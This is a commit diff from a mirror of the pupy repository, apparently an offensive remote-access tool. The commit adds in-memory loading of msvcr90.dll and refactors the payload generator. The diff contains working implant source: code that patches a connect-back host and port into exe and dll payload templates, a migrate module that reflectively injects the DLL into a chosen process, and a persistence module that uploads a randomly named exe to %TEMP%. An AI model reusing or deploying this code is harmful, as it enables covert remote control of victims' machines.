mirror of https://github.com/n1nj4sec/pupy.git
msvcr90 in memory loading + code cleanup
This commit is contained in:
n1nj4sec
parent
d9a76dc0b4
commit
390929f316
|
|
@ -1,9 +1,33 @@
|
|||
#pupy
|
||||
#pupy stuff
|
||||
pupy/data/
|
||||
pupy/.pupy_history
|
||||
.DS_Store
|
||||
# do not ignore package files
|
||||
|
||||
# do not ignore package & templates files
|
||||
!pupy/packages/
|
||||
!pupy/payload_templates/
|
||||
|
||||
#do not redistribute microsoft visual C++ DLLs (LICENSE)
|
||||
client/sources/resources/msvcr90.dll
|
||||
client/sources/resources/msvcr90_x86.dll
|
||||
client/sources/resources/msvcr90_x64.dll
|
||||
|
||||
#Client build related stuff
|
||||
*.obj
|
||||
*.lib
|
||||
*.exp
|
||||
*.exe
|
||||
*.dll
|
||||
client/sources/resources_bootloader_pyc.c
|
||||
client/sources/resources_bootloader.pyc
|
||||
client/sources/resources_python27_dll.c
|
||||
client/sources/resources/library_compressed_string.txt
|
||||
client/sources/resources/python27.dll
|
||||
client/sources/resources_library_compressed_string_txt.c
|
||||
client/sources/resources/library_compressed_string_x86.txt
|
||||
client/sources/resources/library_compressed_string_x64.txt
|
||||
client/sources/resources_msvcr90_dll.c
|
||||
|
||||
|
||||
# Byte-compiled / optimized / DLL files
|
||||
__pycache__/
|
||||
|
|
|
|||
|
|
@ -9,12 +9,15 @@ copy resources\python27_x86.dll resources\python27.dll
|
|||
copy resources\library_compressed_string_x86.txt resources\library_compressed_string.txt
|
||||
"C:\\Python27\\python.exe" gen_resource_header.py resources\library_compressed_string.txt
|
||||
"C:\\Python27\\python.exe" gen_resource_header.py resources\python27.dll
|
||||
copy resources\msvcr90_x86.dll resources\msvcr90.dll
|
||||
"C:\\Python27\\python.exe" gen_resource_header.py resources\msvcr90.dll
|
||||
"C:\\Python27\\python.exe" gen_python_bootloader.py
|
||||
"C:\\Python27\\python.exe" gen_resource_header.py resources\bootloader.pyc
|
||||
::compile them to obj files :
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c resources_library_compressed_string_txt.c
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c resources_bootloader_pyc.c
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c resources_python27_dll.c
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c resources_msvcr90_dll.c
|
||||
|
||||
::then compile
|
||||
|
||||
|
|
@ -31,8 +34,9 @@ copy resources\library_compressed_string_x86.txt resources\library_compressed_st
|
|||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c thread.c
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c remote_thread.c
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c base_inject.c /IC:\Python27\include
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" main_exe.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj /Fepupyx86.exe
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" main_reflective.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj ReflectiveLoader.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj /Fepupyx86.dll /LD
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" main_exe.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj resources_msvcr90_dll.obj /Fepupyx86.exe
|
||||
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" main_reflective.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj ReflectiveLoader.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj resources_msvcr90_dll.obj /Fepupyx86.dll /LD
|
||||
copy pupyx86.dll ..\..\pupy\payloads\
|
||||
copy pupyx86.exe ..\..\pupy\payloads\
|
||||
|
||||
|
|
|
|||
|
|
@ -10,11 +10,14 @@ copy resources\library_compressed_string_x64.txt resources\library_compressed_st
|
|||
copy resources\python27_x64.dll resources\python27.dll
|
||||
"C:\\Python27\\python.exe" gen_resource_header.py resources\python27.dll
|
||||
"C:\\Python27\\python.exe" gen_python_bootloader.py
|
||||
copy resources\msvcr90_x64.dll resources\msvcr90.dll
|
||||
"C:\\Python27\\python.exe" gen_resource_header.py resources\msvcr90.dll
|
||||
"C:\\Python27\\python.exe" gen_resource_header.py resources\bootloader.pyc
|
||||
::compile them to obj files :
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" /c resources_library_compressed_string_txt.c
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" /c resources_bootloader_pyc.c
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" /c resources_python27_dll.c
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\adm64\cl.exe" /c resources_msvcr90_dll.c
|
||||
|
||||
::then compile
|
||||
|
||||
|
|
@ -31,8 +34,8 @@ copy resources\python27_x64.dll resources\python27.dll
|
|||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" /c thread.c /D_WIN64
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" /c remote_thread.c /D_WIN64
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" /c base_inject.c /IC:\Python27\include /D_WIN64
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" main_exe.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj /Fepupyx64.exe /D_WIN64
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" main_reflective.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj ReflectiveLoader.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj /Fepupyx64.dll /LD /D_WIN64
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" main_exe.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj resources_msvcr90_dll.obj /Fepupyx64.exe /D_WIN64
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" main_reflective.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj ReflectiveLoader.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj resources_msvcr90_dll.obj /Fepupyx64.dll /LD /D_WIN64
|
||||
|
||||
copy pupyx64.dll ..\..\pupy\payloads\
|
||||
copy pupyx64.exe ..\..\pupy\payloads\
|
||||
|
|
|
|||
|
|
@ -17,6 +17,8 @@ extern const char resources_python27_dll_start[];
|
|||
extern const int resources_python27_dll_size;
|
||||
extern const char resources_bootloader_pyc_start[];
|
||||
extern const int resources_bootloader_pyc_size;
|
||||
extern const char resources_msvcr90_dll_start[];
|
||||
extern const int resources_msvcr90_dll_size;
|
||||
extern const char resource_python_manifest[];
|
||||
|
||||
extern DL_EXPORT(void) init_memimporter(void);
|
||||
|
|
@ -41,19 +43,22 @@ DWORD WINAPI mainThread(LPVOID lpArg)
|
|||
char * ppath;
|
||||
FILE * f;
|
||||
char tmp_python_dll_path[MAX_PATH];
|
||||
char tmp_manifest_path[MAX_PATH];
|
||||
//char tmp_manifest_path[MAX_PATH];
|
||||
char tmp_path[MAX_PATH];
|
||||
ACTCTX ctx;
|
||||
BOOL activated;
|
||||
HANDLE k32;
|
||||
HANDLE (WINAPI *CreateActCtx)(PACTCTX pActCtx);
|
||||
BOOL (WINAPI *ActivateActCtx)(HANDLE hActCtx, ULONG_PTR *lpCookie);
|
||||
void (WINAPI *AddRefActCtx)(HANDLE hActCtx);
|
||||
BOOL (WINAPI *DeactivateActCtx)(DWORD dwFlags, ULONG_PTR ulCookie);
|
||||
//HANDLE (WINAPI *CreateActCtx)(PACTCTX pActCtx);
|
||||
//BOOL (WINAPI *ActivateActCtx)(HANDLE hActCtx, ULONG_PTR *lpCookie);
|
||||
//void (WINAPI *AddRefActCtx)(HANDLE hActCtx);
|
||||
//BOOL (WINAPI *DeactivateActCtx)(DWORD dwFlags, ULONG_PTR ulCookie);
|
||||
PyGILState_STATE restore_state;
|
||||
|
||||
//InitializeCriticalSection(&csInit);
|
||||
_load_python("msvcr90.dll", resources_msvcr90_dll_start); // needed for the python interpreter
|
||||
|
||||
GetTempPath(MAX_PATH, tmp_path);
|
||||
//InitializeCriticalSection(&csInit);
|
||||
/*
|
||||
k32 = LoadLibrary("kernel32");
|
||||
CreateActCtx = (void*)GetProcAddress(k32, "CreateActCtxA");
|
||||
ActivateActCtx = (void*)GetProcAddress(k32, "ActivateActCtx");
|
||||
|
|
@ -66,7 +71,6 @@ DWORD WINAPI mainThread(LPVOID lpArg)
|
|||
return 0;
|
||||
}
|
||||
|
||||
GetTempPath(MAX_PATH, tmp_path);
|
||||
ZeroMemory(&ctx, sizeof(ctx));
|
||||
ctx.cbSize = sizeof(ACTCTX);
|
||||
GetTempFileName(tmp_path, "tmp", 0, tmp_manifest_path);
|
||||
|
|
@ -88,12 +92,12 @@ DWORD WINAPI mainThread(LPVOID lpArg)
|
|||
#ifndef QUIET
|
||||
DeleteFile(tmp_manifest_path);
|
||||
#endif
|
||||
|
||||
*/
|
||||
|
||||
if(!Py_IsInitialized)
|
||||
{
|
||||
int res=0;
|
||||
activated = ActivateActCtx(MyActCtx, &actToken);
|
||||
//activated = ActivateActCtx(MyActCtx, &actToken);
|
||||
if(!_load_python("python27.dll", resources_python27_dll_start)){
|
||||
|
||||
#ifndef QUIET
|
||||
|
|
@ -177,11 +181,13 @@ DWORD WINAPI mainThread(LPVOID lpArg)
|
|||
//if (PyErr_Occurred())
|
||||
// PyErr_Print();
|
||||
Py_Finalize();
|
||||
/*
|
||||
if (!DeactivateActCtx(0, actToken)){
|
||||
#ifndef QUIET
|
||||
printf("LOADER: Error deactivating context!\n!");
|
||||
#endif
|
||||
}
|
||||
*/
|
||||
//DeleteCriticalSection(&csInit);
|
||||
|
||||
return 0;
|
||||
|
|
|
|||
|
|
@ -19,6 +19,18 @@ import argparse
|
|||
import sys
|
||||
import os.path
|
||||
|
||||
def get_edit_pupyx86_dll(host, ip):
|
||||
return get_edit_binary(os.path.join("payload_templates","pupyx86.dll"), host, ip)
|
||||
|
||||
def get_edit_pupyx64_dll(host, ip):
|
||||
return get_edit_binary(os.path.join("payload_templates","pupyx64.dll"), host, ip)
|
||||
|
||||
def get_edit_pupyx86_exe(host, ip):
|
||||
return get_edit_binary(os.path.join("payload_templates","pupyx86.exe"), host, ip)
|
||||
|
||||
def get_edit_pupyx64_exe(host, ip):
|
||||
return get_edit_binary(os.path.join("payload_templates","pupyx64.exe"), host, ip)
|
||||
|
||||
def get_edit_binary(path, host, ip):
|
||||
binary=b""
|
||||
with open(path, 'rb') as f:
|
||||
|
|
@ -45,35 +57,35 @@ def get_edit_binary(path, host, ip):
|
|||
|
||||
if __name__=="__main__":
|
||||
parser = argparse.ArgumentParser(description='Process some integers.')
|
||||
parser.add_argument('-t', '--type', default='exe_x86', help="exe_x86/dll_x86 exe_x64/dll_x64 (default: exe_x86)")
|
||||
parser.add_argument('-t', '--type', default='exe_x86', choices=['exe_x86','exe_x64','dll_x86','dll_x64'], help="(default: exe_x86)")
|
||||
parser.add_argument('-o', '--output', help="output path")
|
||||
parser.add_argument('-p', '--port', type=int, default=443, help="connect back ip (default:443)")
|
||||
parser.add_argument('host', help="connect back host")
|
||||
args=parser.parse_args()
|
||||
outpath=None
|
||||
if args.type=="exe_x86":
|
||||
binary=get_edit_binary(os.path.join("payloads","pupyx86.exe"), args.host, args.port)
|
||||
binary=get_edit_pupyx86_exe(args.host, args.port)
|
||||
outpath="pupyx86.exe"
|
||||
if args.output:
|
||||
outpath=args.output
|
||||
with open(outpath, 'wb') as w:
|
||||
w.write(binary)
|
||||
elif args.type=="exe_x64":
|
||||
binary=get_edit_binary(os.path.join("payloads","pupyx64.exe"), args.host, args.port)
|
||||
binary=get_edit_pupyx64_exe(args.host, args.port)
|
||||
outpath="pupyx64.exe"
|
||||
if args.output:
|
||||
outpath=args.output
|
||||
with open(outpath, 'wb') as w:
|
||||
w.write(binary)
|
||||
elif args.type=="dll_x64":
|
||||
binary=get_edit_binary(os.path.join("payloads","pupyx64.dll"), args.host, args.port)
|
||||
binary=get_edit_pupyx64_dll(args.host, args.port)
|
||||
outpath="pupyx64.dll"
|
||||
if args.output:
|
||||
outpath=args.output
|
||||
with open(outpath, 'wb') as w:
|
||||
w.write(binary)
|
||||
elif args.type=="dll_x86":
|
||||
binary=get_edit_binary(os.path.join("payloads","pupyx86.dll"), args.host, args.port)
|
||||
binary=get_edit_pupyx86_dll(args.host, args.port)
|
||||
outpath="pupyx86.dll"
|
||||
if args.output:
|
||||
outpath=args.output
|
||||
|
|
|
|||
|
|
@ -39,10 +39,10 @@ class MigrateModule(PupyModule):
|
|||
if self.client.conn.modules['pupwinutils.processes'].is_process_64(args.pid):
|
||||
isProcess64bits=True
|
||||
self.success("process is 64 bits")
|
||||
dllbuff=genpayload.get_edit_binary(os.path.join("payloads","pupyx64.dll"), host, port)
|
||||
dllbuff=genpayload.get_edit_pupyx64_dll(host, port)
|
||||
else:
|
||||
self.success("process is 32 bits")
|
||||
dllbuff=genpayload.get_edit_binary(os.path.join("payloads","pupyx86.dll"), host, port)
|
||||
dllbuff=genpayload.get_edit_pupyx86_dll(host, port)
|
||||
self.success("injecting DLL in target process %s ..."%args.pid)
|
||||
self.client.conn.modules['pupy'].reflective_inject_dll(args.pid, dllbuff, isProcess64bits)
|
||||
self.success("DLL injected !")
|
||||
|
|
|
|||
|
|
@ -27,7 +27,7 @@ class PersistenceModule(PupyModule):
|
|||
|
||||
self.info("generating exe ...")
|
||||
#generating exe
|
||||
exebuff=genpayload.get_edit_binary(os.path.join("payloads","pupyx86.exe"), host, port)
|
||||
exebuff=genpayload.get_edit_pupyx86_exe(host, port)
|
||||
|
||||
remote_path=self.client.conn.modules['os.path'].expandvars("%TEMP%\\{}.exe".format(''.join([random.choice(string.ascii_lowercase) for x in range(0,random.randint(6,12))])))
|
||||
self.info("uploading to %s ..."%remote_path)
|
||||
|
|
|
|||
Loading…
Reference in New Issue